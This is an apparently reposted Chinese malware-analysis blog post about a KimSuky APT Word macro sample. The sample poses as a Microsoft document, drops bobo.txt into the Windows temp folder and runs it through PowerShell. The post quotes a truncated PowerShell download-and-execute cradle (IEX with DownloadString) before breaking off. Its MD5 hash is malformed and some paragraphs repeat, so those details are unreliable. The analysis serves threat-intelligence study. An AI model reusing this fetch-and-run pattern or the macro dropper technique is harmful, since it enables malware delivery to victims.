原文来源：疯猫网络

在平时的威胁情报收集中，发现了一起韩国APT组织KimSuky的攻击事件对整个事件进行完整分析之后，觉得自己对样本分析和流量分析的认识又上了一层楼，在这里分享给大家，希望可以一起学习进步。

Win位

office01

Wireshark

样本MD5为07D0BE79BE8ECB8C7B1C80AB0BD，来源于免费沙箱app.any.run。

app.any.run是一个国际化的免费沙箱，有非常友好的界面，可以很好地跑出大部分恶意样本的行为、网络请求等信息。并且它可以免费下载样本，目前是我分析样本的主要来源。

app.any.run的Publicsubmissions会显示每天捕获到的新样本，然后用户可以点击到对应的样本中查看沙箱报告以及下载样本。

在某天我看到了如下的样本：

app.any.run提示这是一个office宏的恶意文件，考虑到近年来，非PE的恶意文件已经越来越流行。故尝试将这个样本下载回来进行分析。

首先，通过virustotal获取样本的一些基本信息。

通过virustotal可以得知，样本原始名称：

??.???????????.doc

首先，通过virustotal获取样本的一些基本信息。

通过virustotal可以得知，样本原始名称：

??.???????????.doc

创建时间和上传VT时间如下：

根据文件投放名称，可以初步判断该样本是用于攻击朝鲜/韩国的恶意样本光从文件名上暂时无法确定攻击目标。

打开样本，样本伪装为微软官方，提示用户启用宏以查看内容

启用宏之后，文档内容更改为如下所示：

翻译之后如下：

《专家评论》稿件制作样式

?人文名调11pt，行距%，张以内分量

开城工业园区专家评论..。

原始文件是office宏代码的恶意样本，准备对宏代码调试的时候发现代码被加密了：

通过工具破解宏密码之后看到宏代码如下，主要功能是在c:\windows\temp\路径下释放一个bobo.txt文件，然后将一行powershell命令写入到该文件中，再调用执行。

这里由于分析到是powershell.exe指令指令，于是重新打开样本，并通过火绒剑检测powershell.exe的行为

这里可以看到，是读取c:\windows\temp\bobo.txt的内容然后通过iex执行

bobo.txt内容如下

IEX(New-ObjectSystem.Net.WebClient).DownloadString(
转载请注明原文网址：http://www.coolofsoul.com/phpkf/phpkf/24211.html